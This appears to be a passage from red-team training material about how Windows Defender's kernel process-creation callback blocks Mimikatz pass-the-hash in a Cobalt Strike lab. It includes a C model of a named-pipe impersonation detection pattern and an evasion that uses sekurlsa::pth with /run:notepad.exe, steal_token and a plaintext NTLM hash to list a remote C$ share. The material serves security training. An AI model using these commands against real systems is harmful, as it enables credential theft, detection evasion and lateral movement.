Defender also has the ability to inspect the command line arguments of a process and can prevent it from starting if it has malicious content. A common place you may find this is with the built-in pth command.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
We can see from the console log that this expands to the following, and that Mimikatz gets an access denied error when it calls CreateProcessWithLogonW:
user : jking
domain : DEV
program : C:\Windows\system32\cmd.exe /c echo 9c91bb58485 > \\.\pipe\34a65a
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW (0x00000005)
It's not entirely obvious on the surface that this is caused by Defender, but the alert is visible both in the GUI and via Get-MpThreatDetection. The "CmdLine" prefix on the detected resource gives away the origin of the detection. In this case, the trigger is the echo x > \\.\pipe\name pattern, which is synonymous with named pipe impersonation (also obvious from the title of the alert).
The reason this returns an access denied (i.e. Win32 error code 5, ERROR_ACCESS_DENIED) is that the enforcement is coming from the Windows Defender driver in the kernel, not from a user-mode hook. The driver registers a process-creation callback (via PsSetCreateProcessNotifyRoutineEx) and is notified for every new process while it is still being created; the notification carries a PS_CREATE_NOTIFY_INFO structure containing, among other things, the image path and the full command line. The eagle-eyed will spot the CreationStatus member, which is the NTSTATUS value the kernel returns to the creating process. The driver can simply set this to STATUS_ACCESS_DENIED (0xC0000022) to veto the launch; that status is translated to error code 5 and propagates back to the caller, here CreateProcessWithLogonW inside Mimikatz.
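To make the mechanism concrete, here is an added user-mode model of that callback (example code written for this page, not Defender's driver and not the real kernel API). The structure, the callback and the status-to-Win32 mapping are stand-ins for PS_CREATE_NOTIFY_INFO, a PCREATE_PROCESS_NOTIFY_ROUTINE_EX body and RtlNtStatusToDosError respectively; the command-line strings are narrow C strings rather than UNICODE_STRINGs, and the pattern check is a plausible approximation of the "echo x > \\.\pipe\" detection, not Defender's actual signature. Both simplifications are assumptions. The two inputs are the command line the page shows being blocked and the notepad.exe workaround.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal stand-ins for the kernel types (assumption: only the members the
 * example needs are modelled; the real PS_CREATE_NOTIFY_INFO has more). */
typedef int32_t NTSTATUS;
#define STATUS_SUCCESS        ((NTSTATUS)0x00000000)
#define STATUS_ACCESS_DENIED  ((NTSTATUS)0xC0000022)
#define ERROR_ACCESS_DENIED   5UL    /* the 0x00000005 Mimikatz printed */
#define ERROR_MR_MID_NOT_FOUND 317UL /* fallback for an unmapped NTSTATUS */

typedef struct _MODEL_CREATE_NOTIFY_INFO {
    const char *ImageFileName;  /* PCUNICODE_STRING in the real structure */
    const char *CommandLine;    /* PCUNICODE_STRING in the real structure */
    NTSTATUS    CreationStatus; /* NTSTATUS the kernel hands back to the creator */
} MODEL_CREATE_NOTIFY_INFO;

static int lower_ascii(int c) { return (c >= 'A' && c <= 'Z') ? c + 32 : c; }

/* Case-insensitive "does s start with prefix" (avoids non-ISO strncasecmp). */
static bool ci_prefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (lower_ascii((unsigned char)*s) != lower_ascii((unsigned char)*prefix))
            return false;
    return true;
}

static const char *find_ci(const char *hay, const char *needle)
{
    for (; *hay; hay++)
        if (ci_prefix(hay, needle))
            return hay;
    return NULL;
}

/* Approximation of the detection the page's alert keyed on:
 * "echo <anything> > \\.\pipe\<name>", i.e. output redirected into a named
 * pipe, the classic named-pipe impersonation primitive. */
bool looks_like_pipe_impersonation(const char *cmdline)
{
    const char *echo = find_ci(cmdline, "echo ");
    if (!echo)
        return false;
    for (const char *p = echo; (p = strchr(p, '>')) != NULL; p++) {
        const char *target = p + 1;
        while (*target == ' ' || *target == '\t')
            target++;
        if (ci_prefix(target, "\\\\.\\pipe\\"))
            return true;
    }
    return false;
}

/* Model of the callback body. In the kernel this routine is registered with
 * PsSetCreateProcessNotifyRoutineEx and called with the real structure; the
 * only thing it has to do to block the process is set CreationStatus. */
void model_create_process_callback(MODEL_CREATE_NOTIFY_INFO *info)
{
    if (looks_like_pipe_impersonation(info->CommandLine))
        info->CreationStatus = STATUS_ACCESS_DENIED; /* veto the launch */
}

/* NTSTATUS -> Win32 error as the caller sees it after CreateProcess* fails
 * (only the two statuses used here are mapped; others hit the fallback). */
unsigned long model_win32_error(NTSTATUS status)
{
    if (status == STATUS_SUCCESS)       return 0UL;
    if (status == STATUS_ACCESS_DENIED) return ERROR_ACCESS_DENIED;
    return ERROR_MR_MID_NOT_FOUND;
}

/* Run one process creation through the model; returns the Win32 error
 * the creating process would get (0 means the process was allowed). */
unsigned long try_create(const char *image, const char *cmdline)
{
    MODEL_CREATE_NOTIFY_INFO info = { image, cmdline, STATUS_SUCCESS };
    model_create_process_callback(&info);
    return model_win32_error(info.CreationStatus);
}

int main(void)
{
    /* Constructed inputs: the page's blocked pth command line and the workaround. */
    const char *blocked = "C:\\Windows\\system32\\cmd.exe /c echo 9c91bb58485 > \\\\.\\pipe\\34a65a";
    const char *allowed = "notepad.exe";
    printf("pth default : error %lu\n", try_create("C:\\Windows\\system32\\cmd.exe", blocked));
    printf("pth /run    : error %lu\n", try_create("notepad.exe", allowed));
    return 0;
}
```

The point to take away is how little the driver needs: no injection, no API hooking, just a non-success NTSTATUS written into the notification before the kernel finishes creating the process. Anything that only changes the spelling of the command line (different echo token, extra spaces, different case) still matches a pattern like this, which is why the workaround below changes the approach rather than the string.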
Bypassing or disabling kernel-level callbacks is out of scope for RTO. The easiest workaround is to find a way to achieve the same goal, but in a way that doesn't involve the same command line arguments. For pass-the-hash, we can simply have Mimikatz start an arbitrary process (here notepad.exe) and steal its token manually. Note that the stolen token will still report as DEV\bfarmer: sekurlsa::pth creates a network-only (LOGON_NETCREDENTIALS_ONLY) logon, so the process runs locally as the current user while jking's NTLM hash is used for outbound authentication, which is why the directory listing against web succeeds.
beacon> mimikatz sekurlsa::pth /user:"jking" /domain:"DEV" /ntlm:59fc0f884922b4ce376051134c71e22c /run:notepad.exe
user : jking
domain : DEV
program : notepad.exe
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
| PID 17896
| TID 11384
| LSA Process is now R/W
| LUID 0 ; 8586493 (00000000:008304fd)
\_ msv1_0 - data copy @ 00000129694D4070 : OK !
\_ kerberos - data copy @ 00000129694CCD28
beacon> steal_token 17896
[+] Impersonated DEV\bfarmer
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 09/26/2023 08:38:47 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 10/30/2023 13:58:46 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 11/02/2022 09:32:00 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 09/26/2023 08:51:14 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 10/30/2023 13:27:39 DumpStack.log.tmp
384mb fil 10/30/2023 13:27:39 pagefile.sys